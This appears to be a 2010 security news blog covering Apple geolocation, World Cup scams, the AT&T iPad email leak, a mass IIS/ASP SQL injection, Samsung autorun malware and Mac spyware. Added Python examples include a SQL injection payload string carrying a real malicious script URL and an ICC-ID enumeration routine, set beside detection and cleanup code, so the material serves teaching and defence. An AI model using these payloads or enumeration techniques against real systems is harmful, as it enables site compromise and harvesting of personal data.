::Trend Micro Threat Resource Center::

29 June 2010

What's Apple Doing With Geolocation Data?

Congressmen ask for explanation about alterations in the company's privacy policy.

Reps. Edward J. Markey and Joe Barton, co-chairmen of the House Bi-Partisan Privacy Caucus, have asked Apple for an explanation of recent changes in the company's privacy policy.

The congressmen are concerned over media reports that the changes suggest that Apple is collecting and sharing data containing the geographic locations of iPhone and iPad users.

"Given the limited ability of Apple users to opt out of the revised policy and still be able to take advantage of the features of their Apple products, we are concerned about the impact the collection of such data could have on the privacy of Apple's customers," the lawmakers wrote in a letter sent Thursday to Apple chief executive Steve Jobs.

Markey, D-Mass., and Barton, R-Texas, have asked Apple to respond by July 12. Apple did not return a request for comment in time for this writing.

The changes to Apple's general privacy policy were first reported Monday by the Los Angeles Times. The added paragraph would allow Apple and unspecified "partners and licensees" to collect and store user location data, the newspaper said. Users of Apple products would have to agree to the policy first.

Apple has been collecting location data since 2008. The difference now is that Apple has moved the notification of the practice from the End User License Agreements of individual products to its general privacy policy covering all products, the Los Angeles Times reported.

The added passage reads:

"To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services."

While the data is collected anonymously, analysts have shown that such data can be used to identify people based on behavior patterns. However, without the gathering of location data, applications dependent on the information, such as mapping software, wouldn't be very useful. How to balance the need for such information and people's privacy remains an open question.

Nevertheless, the number of smartphones with location-based services is growing dramatically. The number of smartphones with navigation systems supporting such services will rise from 81 million units this year to 297 million by 2014, according to iSuppli.

27 June 2010

FIFA World Cup Soccer - Malware based attacks continue

Symantec and Message Labs continue to warn of malicious email, scams and websites, using the 2010 Soccer World cup theme. Some of these continuing attacks are arriving in my own email, so please be careful:

FIFA World Cup Soccer - Malware based attacks continue
http://www.symantec.com/connect/blogs/fifa-world-cup-scams-continue-circulate

QUOTE: As reported in the June MessageLabs Intelligence Report, MessageLabs Intelligence is seeing a great variety of different threats relating to the upcoming FIFA World Cup. We’ve seen 419-style scams, including emails offering tickets to games; fake accommodation providers; offers of contracts to supply clothing and boots; offers of free mobile phones; scams looking for companies to provide additional electricity/power for the World Cup; and more. All designed to ultimately obtain the recipient’s personal details, and/or money by means of deception and fraud.

MessageLabs Intelligence has also seen fake World Cup tickets for sale on well known auction websites, or advertisements offering tickets, that in reality are unlikely to give the buyer access to any games. Moreover, we’ve seen a huge volume of spam that contains World Cup related content, but is actually not about the World Cup.

24 June 2010

Security Holes Fixed By iOS 4

Apple has released the newest version of the iPhone/iPod/iPad software, collectively known as iOS. Formerly known as iPhone OS, the new name is not the only change to be had with this update.

On Apple's website there is a list of 64 security issues fixed in this new version. The component that was most exposed is WebKit, the browser engine that powers Mobile Safari on iDevices: it accounts for 50 of the patches, roughly three quarters of the total. Over half of the WebKit holes would allow "arbitrary code execution", which is a polite way of saying that an attacker can run code on your device that damages it or reads your personal information, just by getting you to point your mobile browser at the wrong website.

There were 14 non-WebKit security fixes. Safari itself takes the blame for a few of these: cookies were accepted when they should have been blocked, and URLs were mishandled during redirects between http and https sites. There were also vulnerabilities in the handling of "maliciously crafted" BMP, TIFF and JPEG images, which could leak data from Safari's memory to the web server or, again, lead to arbitrary code execution on the device.

Two further severe issues relate to the passcode lock on iDevices. The first involves Remote Lock via MobileMe: if the device is unlocked after receiving a text message or voicemail and is then locked with Remote Lock, the passcode is displayed the next time the device is unlocked, handing access to anyone in physical possession of it. The second involves pairing the device with a new computer, which should only be possible while the device is unlocked. A race condition during boot, if the device was unlocked when it was shut down, can allow it to be paired with a new computer without unlocking it first.

All of these issues have been fixed with the release of iOS 4. Now the only question is whether or not there will be more opportunities for these security holes to be exploited before the iPad version is released this fall, especially now that they have been published.

21 June 2010

HTML files redirect users to malicious sites, evade mail server antivirus

Facebook, Twitter and Skype are Internet behemoths, counting hundreds of millions of users each, so it is not surprising that many malicious email campaigns masquerade as legitimate notices from these three sources.

The number of emails that try to trick recipients into downloading malicious files has surged in the last few days. Users are notified that their Twitter or Facebook password has been reset, that they should check the details of purchases made through Skype, that they have messages waiting for them, and so on.

What these emails have in common is that they carry a .html attachment whose name changes from email to email but which always contains a script that redirects the user to a website rife with malicious code. That site tries to exploit vulnerabilities in Adobe products, Internet Explorer and Java, and through them downloads malware onto the user's computer.

A Bkis security researcher thinks we are witnessing the birth of a new trend. According to him, attackers will be switching to this kind of malicious file for two reasons:
  • A lot of people have learned by now that .exe and .zip attachments are probably bad news and delete the email, but .html files have so far avoided looking instantly suspicious.
  • These .html attachments contain no malicious or exploit code of their own, only the redirect, which makes them well suited to bypassing the antivirus integrated in mail servers, or antivirus solutions in general.
When you think about it, the file in question does exactly what a malicious link would do, but - once again - many users have learned not to click on those either.
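As an added illustration of the attachment type described above (example code written for this page, not a sample from the article or from Bkis), the following Python script triages a set of constructed .html attachments for the two redirect constructs such files rely on, a meta refresh or a script assignment to location, and extracts the destination so the hosts can be blocked at the proxy or resolver. The attachment contents, filenames and the example.invalid hosts are made up.

```python
import re
from urllib.parse import urlparse

# Constructed attachments modelled on the campaign described above; filenames,
# contents and the example.invalid hosts are made up for this example.
SAMPLES = {
    "Twitter_Password_Reset.html": """<html><body>
<script type="text/javascript">
window.location = "http://example.invalid/reset/index.php?id=734";
</script></body></html>""",
    "Skype_Invoice_8812.html": """<html><head>
<meta http-equiv="refresh" content="0;url=http://example.invalid/invoice/">
</head><body>Loading your invoice...</body></html>""",
    "Facebook_Notice.html": """<html><body><script>
setTimeout(function () { document.location.href = "http://example.invalid/fb/"; }, 100);
</script></body></html>""",
    "Quarterly_Report.html": """<html><body>
<h1>Q2 figures</h1><p>See the attached table.</p>
<a href="http://intranet.example/report">Full report</a>
</body></html>""",
}

# <meta http-equiv="refresh" content="0;url=...">
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*'
    r'content\s*=\s*["\']?\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)',
    re.I,
)
# window.location = "...", document.location.href = "...", location.replace("...")
JS_LOCATION = re.compile(
    r'(?:(?:window|document|top|self)\.)?location(?:\.href)?\s*'
    r'(?:=|\.replace\(|\.assign\()\s*["\']([^"\']+)["\']',
    re.I,
)


def find_redirects(html_text):
    """Return (kind, target_url) for every redirect construct in the HTML.
    The attachment carries no exploit code itself, only the hop to the exploit
    site, so an unconditional redirect is the signal a mail gateway can key on."""
    found = []
    for kind, pattern in (("meta-refresh", META_REFRESH), ("js-location", JS_LOCATION)):
        for m in pattern.finditer(html_text):
            found.append((kind, m.group(1)))
    return found


def triage(attachments):
    """Map attachment name -> list of redirects found (empty list means clean)."""
    return {name: find_redirects(body) for name, body in attachments.items()}


def redirect_hosts(results):
    """Distinct destination hosts, ready for a proxy or DNS blocklist."""
    return sorted({urlparse(url).hostname for hits in results.values() for _, url in hits})


if __name__ == "__main__":
    results = triage(SAMPLES)
    for name, hits in results.items():
        print(f"{name}: {'SUSPICIOUS ' + str(hits) if hits else 'no redirect'}")
    print("hosts to block:", redirect_hosts(results))
```

This is a triage heuristic, not a replacement for detonating the attachment: a campaign that assembles the URL from string fragments or decodes it at runtime will slip past the regexes, so treat any .html attachment that contains script at all as worth a closer look.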

19 June 2010

Cracked Wi-Fi Standards (Finally) Being Phased Out

Standards groups say WEP, TKIP will no longer be allowed in interoperability tests.

For years, security managers have been frustrated by the continued use of outdated Wi-Fi encryption standards that have been proved to be insecure. Now it appears that standards groups are going to do something about it.

According to a news report by H-Online, the Wi-Fi Alliance -- which tests the interoperability of IEEE wireless LAN products -- has scheduled a phaseout of products that use WEP and TKIP, two encryption standards that have been repeatedly broken by security researchers.

"As early as January of 2011, the WFA plans to disallow TKIP for new access points (APs); from 2012, the obsolete standard is to be disallowed in all Wi-Fi devices," the report states. "For WEP, the bell will toll a little later: From 2013, APs will no longer be allowed to offer WEP, and a year later the standard will be disallowed in all Wi-Fi devices."

In addition, the WPA2-Mixed mode, in which access points are allowed to offer TKIP for secondary encryption, will be removed in 2014, the report says. Only WPA2-AES will be permissible from then on.

Many users believe they can keep their Wi-Fi transmissions safe by using WEP or TKIP -- and because the technologies are often shipped in new products, they have no reason to believe otherwise. Even at the RSA conference earlier this year -- a conference attended primarily by security professionals -- more than 60 percent of Wi-Fi nodes were still using WEP or TKIP.
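Before the phaseout bites, the practical question for a security manager is how many of the networks in their own airspace are still on WEP or TKIP. The Python below is an added example for this page (not code from the H-Online report or the Wi-Fi Alliance): it parses a constructed excerpt in the layout of `iw dev wlan0 scan` output, classifies each network from its capability bits and RSN/WPA information elements, and reports the share that falls under the phaseout. BSSIDs and SSIDs in the sample are made up.

```python
import re

# Constructed excerpt in the layout of `iw dev wlan0 scan` output; BSSIDs and
# SSIDs are made up for this example.
SCAN = """\
BSS 00:11:22:33:44:01(on wlan0)
    SSID: corp-legacy
    capability: ESS Privacy (0x0411)
BSS 00:11:22:33:44:02(on wlan0)
    SSID: guest
    capability: ESS Privacy (0x0411)
    WPA:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: TKIP
         * Authentication suites: PSK
BSS 00:11:22:33:44:03(on wlan0)
    SSID: corp-mixed
    capability: ESS Privacy (0x0411)
    RSN:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: CCMP TKIP
         * Authentication suites: PSK
BSS 00:11:22:33:44:04(on wlan0)
    SSID: corp
    capability: ESS Privacy (0x0411)
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: IEEE 802.1X
BSS 00:11:22:33:44:05(on wlan0)
    SSID: cafe-open
    capability: ESS (0x0401)
"""

# Modes the Wi-Fi Alliance schedule above disallows.
DEPRECATED = {"wep", "wpa-tkip", "wpa2-mixed"}


def parse_scan(text):
    """Split scan output into one record per BSS with its security IEs."""
    nets, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"BSS ([0-9a-f:]{17})", line, re.I)
        if m:
            cur = {"bssid": m.group(1).lower(), "ssid": "", "privacy": False, "RSN": {}, "WPA": {}}
            nets.append(cur)
            section = None
        elif cur is None:
            continue
        elif line.startswith("SSID:"):
            cur["ssid"] = line[len("SSID:"):].strip()
        elif line.startswith("capability:"):
            cur["privacy"] = "Privacy" in line          # privacy bit: some encryption in use
        elif line.startswith(("RSN:", "WPA:")):
            section = line[:3]                           # cipher lines that follow belong to this IE
        elif section and line.startswith("* Group cipher:"):
            cur[section]["group"] = line.split(":", 1)[1].split()
        elif section and line.startswith("* Pairwise ciphers:"):
            cur[section]["pairwise"] = line.split(":", 1)[1].split()
    return nets


def classify(net):
    """Privacy bit with no RSN/WPA IE means WEP; TKIP anywhere in an RSN IE is mixed mode."""
    if not net["privacy"]:
        return "open"
    rsn, wpa = net["RSN"], net["WPA"]
    if not rsn and not wpa:
        return "wep"
    ie = rsn or wpa
    ciphers = set(ie.get("group", [])) | set(ie.get("pairwise", []))
    if rsn:
        return "wpa2-mixed" if "TKIP" in ciphers else "wpa2-aes"
    return "wpa-tkip" if "TKIP" in ciphers else "wpa-aes"


def audit(text):
    """One result per network: mode and whether it falls under the phaseout."""
    results = []
    for net in parse_scan(text):
        mode = classify(net)
        results.append({"bssid": net["bssid"], "ssid": net["ssid"],
                        "mode": mode, "deprecated": mode in DEPRECATED})
    return results


def deprecated_share(results):
    """Fraction of observed networks still on WEP or TKIP."""
    return sum(r["deprecated"] for r in results) / len(results) if results else 0.0


if __name__ == "__main__":
    results = audit(SCAN)
    for r in results:
        print(f"{r['bssid']}  {r['ssid']:<12} {r['mode']:<11} {'PHASE OUT' if r['deprecated'] else ''}")
    print(f"{deprecated_share(results):.0%} of networks on WEP/TKIP")
```

Note that a network advertising both CCMP and TKIP is flagged even though CCMP clients get AES: the group key still has to be TKIP for the TKIP clients, which is exactly the mixed mode the 2014 date removes.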

18 June 2010

Months-old Skype vulnerability exploited in the wild

A Skype flaw patched some nine months ago, with version 4.1.0.179 of the VoIP client, has been spotted being exploited in the wild.

According to M86 Security Labs, the vulnerability lies in the EasyBits Extras Manager, a plug-in component for Skype, and for everyone who hasn't updated their client it presents a gaping hole in their security perimeter.

Through this exploit the attackers download malware onto the user's system, and the payload bypasses the great majority of antivirus solutions.

Bradley Anstis, VP of Technology for M86 Security says that there is no evidence that the campaign is a massive one, but it definitely points out the fact that updating software is of crucial importance.

Dancho Danchev points out that Skype is well known for a glitch that prevents users from updating the client through the "Check for updates" feature. To get the new version they have to download and install it manually, which makes updating inconvenient and leaves users stuck with the old version.

12 June 2010

114,000 iPad 3G Owners' Email Addresses Exposed By AT&T

A group called Goatse Security was able to grab 114,067 personal email addresses of iPad buyers from AT&T's website.

Some of the email addresses leaked belong to White House Chief of Staff Rahm Emanuel, New York City Mayor Michael Bloomberg, Diane Sawyer of ABC News, and many CEOs, CFOs and CTOs. A number of the exposed addresses were even those of DARPA researchers and high-ranking military officials.

Each iPad 3G comes with an ICC-ID, or "integrated circuit card identifier", the number that uniquely identifies the subscriber's SIM card. Normally the mapping from ICC-ID to subscriber would not be publicly accessible.

AT&T goofed big time and left a script on its website that anyone could query. Given an ICC-ID, the script responded with the subscriber's email address. It was intended for use by AJAX code on AT&T's own pages, but obviously had no protections built in.

This lack of security allowed the researchers to write a simple PHP script that presented an iPad browser user-agent string and could have grabbed potentially millions of addresses. It would not have been possible without all the pictures of iPads online that helped them guess ICC-IDs. Like any exploit group that wants fame, these guys shared the script and corresponding info with many others like them before reporting the gaping security hole to AT&T.
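The core of the problem is an unauthenticated lookup keyed on an identifier that is easy to guess. The Python below is an added example for this page (not Goatse Security's script or AT&T's code): it shows why guessing works, since ICC-IDs end in a Luhn check digit that anyone can compute, so every neighbouring number yields exactly one valid ID; it models the exposed endpoint as a plain dictionary lookup; and it contrasts that with a handler that answers only for the ICC-ID bound to an authenticated session. The subscriber table, the ICC-ID values and the session mechanism are all constructed for the example; the real endpoint, the user-agent check and the enumeration details are not reproduced.

```python
import secrets


def luhn_check_digit(payload):
    """Luhn check digit for a digit string. ICC-IDs (ITU-T E.118) end in one, so a
    guessed ID can be validated offline before a single request is sent."""
    total = 0
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:                     # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(iccid):
    return iccid.isdigit() and len(iccid) > 1 and luhn_check_digit(iccid[:-1]) == iccid[-1]


def neighbours(seed_iccid, span):
    """Valid ICC-IDs whose payload lies within +/- span of the seed's. The check
    digit is a function of the payload, so each neighbour gives exactly one valid
    ID: the check digit adds no secrecy at all."""
    payload = seed_iccid[:-1]
    base, width = int(payload), len(payload)
    ids = []
    for n in range(max(base - span, 0), base + span + 1):
        p = str(n).zfill(width)
        ids.append(p + luhn_check_digit(p))
    return ids


def build_sample_subscribers(seed_payload="890141000000100000", count=5):
    """Constructed subscriber table: synthetic, consecutive ICC-IDs -> addresses."""
    subs = {}
    for k in range(count):
        p = str(int(seed_payload) + k).zfill(len(seed_payload))
        subs[p + luhn_check_digit(p)] = f"user{k}@example.invalid"
    return subs


def vulnerable_lookup(subscribers, iccid):
    """Shape of the endpoint described above: any valid ICC-ID returns the
    subscriber's address, with nothing tying the caller to that SIM."""
    return subscribers.get(iccid)


def harvest(subscribers, seed_iccid, span):
    """Enumeration against the vulnerable endpoint: walk the neighbours, keep the hits."""
    hits = []
    for iccid in neighbours(seed_iccid, span):
        email = vulnerable_lookup(subscribers, iccid)
        if email:
            hits.append((iccid, email))
    return hits


def issue_session(sessions, iccid):
    """Server-side session created only after the device has authenticated; the
    token is random and bound to the one ICC-ID the device proved it owns."""
    token = secrets.token_urlsafe(32)
    sessions[token] = iccid
    return token


def hardened_lookup(subscribers, sessions, token, iccid):
    """Answer only for the ICC-ID bound to a valid session. Every other ID is a
    miss, so guessing IDs buys the attacker nothing without the matching device."""
    if sessions.get(token) != iccid:
        return None
    return subscribers.get(iccid)


if __name__ == "__main__":
    subs = build_sample_subscribers()
    seed = next(iter(subs))
    print("harvested via vulnerable endpoint:", harvest(subs, seed, 50))
    sessions = {}
    token = issue_session(sessions, seed)
    print("own record via hardened endpoint:", hardened_lookup(subs, sessions, token, seed))
    print("neighbour via hardened endpoint:", hardened_lookup(subs, sessions, token, neighbours(seed, 1)[-1]))
```

The lesson generalises beyond ICC-IDs: any lookup keyed on a predictable identifier (account numbers, sequential order IDs, device serials) needs the caller to prove it is entitled to that particular record, not merely to present a well-formed key.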

So now Steve Jobs has a bit of a problem. Over a hundred thousand customers' addresses, and potentially millions, have been made available to groups that could use them for malicious purposes. Not only that, but the iPad 3G looks rather unappealing now, even though it was not Apple that was responsible for the breach.

If you bought an iPad 3G and have an email address that doesn't reveal your identity, plus a strong password for it, you might be safe. Still, now is as good a time as any to change your email password to something stronger. And if your email is firstname.lastname@mysite.com or something similar, be very cautious about whose PDFs you open and which links you click in emails. It's easier than you might think for criminals to target a victim with a convincing, specially crafted email that appears to come from co-workers or friends.

References: http://security.goatse.fr/

11 June 2010

Mass SQL injection attack compromises IIS/ASP sites

Thousands of websites and who knows how many visitors were affected by the recently discovered mass SQL injection attack that targeted - among others - The Wall Street Journal and The Jerusalem Post websites.

Sucuri Security spotted the attack on many websites and Googled the http://ww.robint.us/u.js address to which the injected script tag pointed; according to the results, some 114,000 different pages contained it.

Further investigation revealed the common denominator: all the sites are hosted on IIS servers and use ASP.NET. By sifting through the logs and the packet dump of the attack, they also discovered that the injection was launched against a third-party ad management script.

When a user visits a compromised site, the injected code attempts to redirect them to a site where malware is waiting to be installed on their machine, giving the criminals behind the attack remote access to it.

Mary Landesman, a security researcher with Cisco, claims that only around 7,000 pages are infected (she searched Google for the entire injected script tag, not just the URL it points to). She also points out that on larger websites only certain pages are infected, which - she admits - might not mean much to affected users.
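For a site owner the two immediate questions are how the tag got into the content and how to find every cell that now carries it. The Python below is an added example for this page (not Sucuri's, Cisco's or the attackers' code): it models the injectable ad script as a query built by string concatenation, shows the stacked-UPDATE shape that such mass injections use to append a script tag to every row, puts the parameterised form beside it, and then sweeps every column of every table for the marker and strips it. The content database, table names and the exact tag form are constructed for the example; only the script URL comes from the article. SQLite stands in for SQL Server, with executescript() used to emulate a connection that accepts stacked statements.

```python
import sqlite3

# Script URL from the article; the surrounding tag form is an assumption.
INJECTED_URL = "http://ww.robint.us/u.js"
INJECTED_TAG = f"<script src={INJECTED_URL}></script>"

# Shape of the payload behind such mass injections: a stacked UPDATE tacked onto a
# request parameter that the ad script pastes into its query (constructed here).
PAYLOAD = f"1; UPDATE ads SET body = body || '{INJECTED_TAG}'"


def build_sample_db():
    """Constructed content database standing in for the site's backend, with one
    article already carrying the injected tag."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE ads (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE articles (id INTEGER PRIMARY KEY, headline TEXT, html TEXT);
        INSERT INTO ads VALUES (1, 'Summer sale', '<p>Buy now</p>');
        INSERT INTO ads VALUES (2, 'Autumn sale', '<p>Buy later</p>');
        INSERT INTO articles VALUES (1, 'Markets', '<p>Stocks up</p>');
        INSERT INTO articles VALUES (2, 'Sports', '{INJECTED_TAG}<p>Final score</p>');
    """)
    return conn


def vulnerable_ad_lookup(conn, ad_id):
    """The injectable pattern: the request parameter is pasted into the SQL text.
    executescript() emulates a SQL Server connection, which runs stacked
    statements; sqlite3's execute() would refuse the second statement."""
    conn.executescript(f"SELECT title FROM ads WHERE id = {ad_id};")


def safe_ad_lookup(conn, ad_id):
    """Parameterised form: the value is bound, never parsed as SQL."""
    return conn.execute("SELECT title FROM ads WHERE id = ?", (ad_id,)).fetchall()


def find_injected(conn, marker=INJECTED_URL):
    """Sweep every column of every table for the marker. Table and column names
    come from the schema catalogue, not from a request, so quoting them is safe."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        columns = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for column in columns:
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE instr(CAST("{column}" AS TEXT), ?) > 0',
                (marker,)).fetchall()
            hits.extend((table, column, r[0]) for r in rows)
    return hits


def remove_injected(conn, tag=INJECTED_TAG):
    """Strip the tag from every affected cell; returns the number of cells cleaned."""
    cleaned = 0
    for table, column, rowid in find_injected(conn, tag):
        conn.execute(f"UPDATE \"{table}\" SET \"{column}\" = replace(\"{column}\", ?, '') WHERE rowid = ?",
                     (tag, rowid))
        cleaned += 1
    conn.commit()
    return cleaned


if __name__ == "__main__":
    conn = build_sample_db()
    print("before:", find_injected(conn))
    print("parameterised lookup with payload:", safe_ad_lookup(conn, PAYLOAD))
    vulnerable_ad_lookup(conn, PAYLOAD)
    print("after injection:", find_injected(conn))
    print("cleaned cells:", remove_injected(conn), "remaining:", find_injected(conn))
```

On a real SQL Server backend the same sweep is driven from INFORMATION_SCHEMA.COLUMNS rather than sqlite_master, and cleaning the rows is only half the job: the injectable script has to be fixed, or the content will be re-infected on the next pass.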

10 June 2010

Beware when placing online bets during the World Cup

With the World Cup approaching, online players all over the world are preparing to place bets on the different soccer games, and judging by recent trends most of those bets will be placed through betting websites.

The occasion presents plenty of opportunities for hacking, phishing or man-in-the-middle attacks against players going online to place a bet.

To safeguard online players, VASCO has outlined some guidelines to keep in mind when betting online during the World Cup period. A few simple rules can already help bettors keep credit card details, digital assets and personal data from being exposed online. Cautious behavior includes:
  • Make sure the betting website is trustworthy and the operator is licensed
  • Check if the website has a privacy policy to make sure your personal data are safe
  • The website should be secured using SSL
  • Know what you are betting for; know what it will cost you
  • Choose a provider that uses two factor authentication which offers enhanced security for players placing bets.

09 June 2010

Fake Facebook account deactivation email

Sunbelt reports that in a spam run that may at first glance appear to be a phishing attempt aimed at your login credentials, mailboxes around the world have been filled with an email supposedly coming from "The Facebook Team".

Since the latest changes to Facebook's security settings caused quite a stir and many people did deactivate their accounts, these spammers are obviously counting on people who haven't to worry that their account has been deactivated by mistake.

Luckily for recipients, a click on the "Sing In" link in the email does not lead to a phishing site but to a Canadian Pharmacy site that tries to peddle its wares. Annoying? Yes - but less harmful than phishing.

Still, users should be careful when clicking on links in emails and avoid those in unsolicited emails.

Rootkits on Android smartphones

As our mobile phones get "smarter" and our personal and professional lives get increasingly mobile, the possibility of these devices getting compromised and the negative effects of such an occurrence are starting to worry a lot of people.

Nicholas Percoco and Christian Papathanasiou, two security researchers from Trustwave, have taken it upon themselves to investigate the possibility of creating a rootkit for Android smartphones that would allow an attacker to gain access to the device and the data inside it.

They have recently announced that they came up with a proof-of-concept kernel-level rootkit in the form of a loadable kernel module, with the help of which they will demonstrate an attack on an Android smartphone at the DefCon conference next month.

The rootkit "is able to send an attacker a reverse TCP over 3G/WIFI shell upon receiving an incoming call from a 'trigger number'. This ultimately results in full root access on the Android device," they say. "The implications of this are huge; an attacker can proceed to read all SMS messages on the device/incur the owner with long-distance costs, even potentially pin-point the mobile device's exact GPS location. Such a rootkit could be delivered over-the-air or installed alongside a rogue app."

So Android users, keep a lookout!

08 June 2010

Critical Adobe Flash, Reader 0-day flaw exploited in the wild

A zero-day flaw affecting 10.0.x and 9.0.x versions of Adobe Flash Player - including the current version, which is 10.0.45.2 - has been spotted being exploited in the wild. The flaw also affects Adobe Reader and Acrobat 9.3.2 and earlier 9.x, since the vulnerable authplay.dll component ships with those products.

Adobe released on Friday the security advisory detailing the particulars of the critical vulnerability, saying that it "could cause a crash and potentially allow an attacker to take control of the affected system," and that "there are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat."

While waiting for the fix, Adobe advises users to switch to the Flash Player 10.1 Release Candidate, which does not appear to be vulnerable, or, in Adobe's words, to try "deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x." This mitigates the threat, but users will then be unable to open PDF files containing Flash content: the program will either crash or show an error message.

05 June 2010

Top 5 FIFA World Cup online risks

Lavasoft warned computer users to be aware of stealthy online traps set by cybercriminals to leverage public interest surrounding the 2010 FIFA World Cup – and issued advice to follow to make sure people enjoy the month-long tournament without becoming the target or victim of an attack.

The World Cup, which begins in only one week and runs until mid-July, is the most widely viewed sporting event in the world. Events that draw such pervasive and ongoing public interest will, without a doubt, be used to propagate socially engineered crimes, where users are manipulated into performing certain actions or disclosing confidential information.

Lavasoft analysts anticipate that the following five online security risks will be most prevalent leading up to and during the World Cup, and offer specific steps to take to avoid becoming a victim.

Read on for the tips to avoid the online risks.

04 June 2010

Samsung smartphone shipped with malware-infected memory card

The latest mass-market product found shipping to customers with malware on board is the Samsung S8500 Wave phone, which runs Samsung's bada mobile platform.

The malicious file in question is slmvsrv.exe, found on the 1GB microSD memory card that ships with the phone. It is accompanied by an Autorun.inf file, which causes it to run, and install itself, on any Windows PC that still has AutoRun enabled when the card is plugged in.

Michael Oryl says he received a device for testing and, after finding that the card was infected, searched online for the file and unearthed two posts on German forums reporting the same thing. He contacted Samsung, who confirmed that the initial production run of devices shipped to Germany was indeed infected.

"A PC that is infected with the malware will try to copy the program and associated autorun.inf file onto any memory card or USB memory drive that is inserted into the infected computer. The copied files will show the then-current date and time, which indicates that our memory card was infected in the first half of May, before the phone was shipped overseas to us," says Oryl.

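The infection mechanism is nothing more than an autorun.inf pointing Windows at an executable on the same volume, which also makes it easy to check for. The Python below is an added example for this page (not Samsung's, Oryl's or any vendor's tool): it parses the launch directives of an autorun.inf (open=, shellexecute= and shell\<verb>\command=), checks whether the referenced files actually exist on the volume, and runs against two constructed throwaway directories standing in for an infected and a clean card. The autorun.inf contents and the placeholder executable are made up; only the filename slmvsrv.exe comes from the article.

```python
import configparser
import os
import tempfile

# Constructed autorun.inf in the shape such droppers use; the directives and
# executable name mirror the article, the exact file contents are made up.
AUTORUN_SAMPLE = """[autorun]
open=slmvsrv.exe
shellexecute=slmvsrv.exe
shell\\open\\command=slmvsrv.exe
shell\\open=Open
icon=slmvsrv.exe
"""

LAUNCH_KEYS = ("open", "shellexecute")
EXEC_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")


def launch_targets(inf_text):
    """Files an autorun.inf would execute: open=, shellexecute= and any
    shell\\<verb>\\command= entry. Section and key names are matched
    case-insensitively, as Windows treats them."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(inf_text)
    targets = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):          # configparser lowercases keys
            if key in LAUNCH_KEYS or key.endswith("\\command"):
                target = value.strip().split()[0].strip('"') if value.strip() else ""
                if target and target not in targets:
                    targets.append(target)
    return targets


def scan_volume(mount_point):
    """Inspect a mounted removable volume for an autorun.inf that launches an
    executable present on the same volume, the pattern of the infected card."""
    inf_name = next((n for n in os.listdir(mount_point) if n.lower() == "autorun.inf"), None)
    report = {"autorun_present": inf_name is not None, "targets": [],
              "present_on_volume": [], "suspicious": False}
    if inf_name is None:
        return report
    with open(os.path.join(mount_point, inf_name), encoding="utf-8", errors="replace") as f:
        report["targets"] = launch_targets(f.read())
    report["present_on_volume"] = [t for t in report["targets"]
                                   if os.path.exists(os.path.join(mount_point, t))]
    report["suspicious"] = any(t.lower().endswith(EXEC_SUFFIXES) for t in report["present_on_volume"])
    return report


def make_sample_card(infected):
    """Build a throwaway directory standing in for the phone's microSD card."""
    card = tempfile.mkdtemp(prefix="wave-card-")
    os.makedirs(os.path.join(card, "DCIM"))
    if infected:
        with open(os.path.join(card, "Autorun.inf"), "w") as f:
            f.write(AUTORUN_SAMPLE)
        with open(os.path.join(card, "slmvsrv.exe"), "wb") as f:
            f.write(b"MZ")          # placeholder bytes, not the real dropper
    return card


if __name__ == "__main__":
    for infected in (True, False):
        print("infected card:" if infected else "clean card:", scan_volume(make_sample_card(infected)))
```

Run it from a machine with AutoRun disabled (the NoDriveTypeAutoRun policy), otherwise merely mounting the card to inspect it is the infection step the check is meant to prevent.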
03 June 2010

Popular websites distribute spyware-infected Mac software

Intego has discovered a spyware application that is installed by a number of freely distributed Mac applications and screen savers found on a variety of websites.

This spyware, OSX/OpinionSpy, performs a number of malicious actions, from scanning files to recording user activity, as well as sending information about this activity to remote servers and opening a backdoor on infected Macs.

OSX/OpinionSpy is installed by a number of applications and screen savers that are distributed on sites such as MacUpdate, VersionTracker and Softpedia. The spyware itself is not contained in these applications, but is downloaded during the installation process. This shows the need for an up-to-date anti-malware program with a real-time scanner that can detect this malware when it is downloaded by the original application’s installer.

The information provided with some of these applications contains misleading text, which users must accept, explaining that a "market research" program is installed alongside them; not all of them say so, however. Some of these programs are also distributed directly from developers' web sites with no such warning.

The malware, a version of which has existed for Windows since 2008, claims to collect browsing and purchasing information that is used in market reports. However, this program goes much further, performing a number of insidious actions, which have led Intego to classify it as spyware.

Detailed analysis of the spyware here.

As seen in the detailed report, this application that purports to collect information for marketing reasons does much more, going as far as scanning all the files on an infected Mac. Users have no way of knowing exactly what data is collected and sent to remote servers; such data may include user names, passwords, credit card numbers and more. The risk of this data being collected and used without users’ permission makes this spyware particularly dangerous to users’ privacy.

The fact that this application collects data in this manner, and that it opens a backdoor, makes it a very serious security threat. In addition, the risk of it collecting sensitive data such as user names, passwords and credit card numbers, makes this a very high-risk spyware. While its distribution is limited, we warn Mac users to pay careful attention to which software they download and install.

02 June 2010

Critical vulnerabilities in Photoshop CS4

Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for Windows and Macintosh that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system.

A malicious .ASL, .ABR, or .GRD file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit these vulnerabilities.

